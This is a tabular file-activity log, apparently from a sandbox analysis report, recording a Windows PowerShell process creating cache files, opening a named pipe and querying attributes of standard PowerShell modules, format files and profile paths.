| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46610b03-43d8-466e-ac05-954274c00100 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28 | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Pipe | \device\namedpipe\pshost.131891832590894829.4088.defaultappdomain.powershell | open_mode = PIPE_ACCESS_INBOUND, PIPE_ACCESS_OUTBOUND, FILE_FLAG_FIRST_PIPE_INSTANCE, FILE_FLAG_OVERLAPPED, pipe_mode = PIPE_READMODE_MESSAGE, PIPE_TYPE_MESSAGE, max_instances = 1 |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.config | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\typesv3.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_attributes |
|
4 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi | type = file_attributes |
|
5 | |
| Get Info | C:\ | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\wldp.dll | type = file_attributes |
|
30 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\ | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1 | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\iiqbe4ps.w2t.psm1 | type = file_type |
|
2 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\bwaykzvy.uyx.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Temp\iiqbe4ps.w2t.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\HelpV3.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml | type = file_type |
|
4 | |
| Get Info | C:\Users\Nd9E1FYi\Desktop | type = file_attributes |
|
9 | |
| Get Info | C:\Users | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1 | type = file_attributes |
|
1 | |
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | type = file_attributes |
|
1 | |
| Get Info | C:\ProgramData\Oracle\Java\javapath | type = file_attributes |
|
32 | |
| Get Info | C:\Windows\system32 | type = file_attributes |
|
32 | |
| Get Info | C:\Windows | type = file_attributes |
|
32 | |
| Get Info | C:\Windows\System32\Wbem | type = file_attributes |
|
31 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\ | type = file_attributes |
|
7 | |
| Get Info | C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules | type = file_attributes |
|
21 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules | type = file_attributes |
|
12 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules | type = file_attributes |
|
12 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\AppLocker\AppLocker.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Appx | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Appx\Appx.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\BitLocker\BitLocker.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\BranchCache\BranchCache.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Dism | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Dism\Dism.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\DnsClient\DnsClient.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\International | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\International\International.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\iSCSI\iSCSI.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\ISE | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\ISE\ISE.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Kds | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Kds\Kds.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.psm1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.cdxml | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.xaml | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\en-US\en-US.dll | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
2 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.psm1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.cdxml | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.xaml | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.dll | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1 | type = file_attributes |
|
2 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.WSMan.Management | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.WSMan.Management\Microsoft.WSMan.Management.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\MMAgent | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\MMAgent\MMAgent.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\MsDtc | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\MsDtc\MsDtc.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\NetAdapter\NetAdapter.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\NetLbfo\NetLbfo.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PrintManagement | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PrintManagement\PrintManagement.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PSDesiredStateConfiguration | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PSDesiredStateConfiguration\PSDesiredStateConfiguration.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PSDiagnostics | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PSDiagnostics\PSDiagnostics.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PSScheduledJob\PSScheduledJob.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflow | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflow\PSWorkflow.psd1 | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflowUtility | type = file_attributes |
|
1 | |
| Get Info | c:\windows\system32\windowspowershell\v1.0\Modules\PSWorkflowUtility\PSWorkflowUtility.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | type = file_type |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1 | type = file_attributes |
|
4 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1 | type = file_attributes |
|
3 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml | type = file_attributes |
|
3 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml | type = file_attributes |
|
3 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll | type = file_attributes |
|
3 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5 | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.psm1 | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.cdxml | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.xaml | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\3.3.5.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | type = file_attributes |
|
3 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psd1 | type = file_type |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psd1 | type = file_attributes |
|
3 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.cdxml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\Pester.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.cdxml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\1.0.0.1.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1 | type = file_type |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psd1 | type = file_attributes |
|
3 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.cdxml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\PowerShellGet.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.cdxml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\en\en.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.cdxml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\1.1.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadline.psd1 | type = file_type |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.cdxml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.xaml | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\PSReadline.dll | type = file_attributes |
|
1 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\ | type = file_attributes |
|
24 | |
| Get Info | C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex | type = file_type |
|
4 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psm1 | type = file_attributes |
|
4 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1 | type = file_attributes |
|
5 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1 | type = file_attributes |
|
3 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\Pester\3.3.5\Pester.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Program Files\WindowsPowerShell\Modules\PSReadline\1.1\PSReadLine.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1 | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtilsHelper.ps1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1 | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Host\Microsoft.PowerShell.Host.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Diagnostics\Microsoft.PowerShell.Diagnostics.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Archive\Microsoft.PowerShell.Archive.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppBackgroundTask\AppBackgroundTask.psd1 | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AppLocker\AppLocker.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Appx\Appx.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\AssignedAccess\AssignedAccess.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\BitsTransfer.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BranchCache\BranchCache.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\CimCmdlets\CimCmdlets.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender\Defender.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DirectAccessClientComponents\DirectAccessClientComponents.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psm1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Dism\Dism.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DnsClient\DnsClient.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\EventTracingManagement\EventTracingManagement.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\International\International.psd1 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\system32\WindowsPowerShell\v1.0\Modules\iSCSI\iSCSI.psd1 | type = file_attributes |
|
1 | |
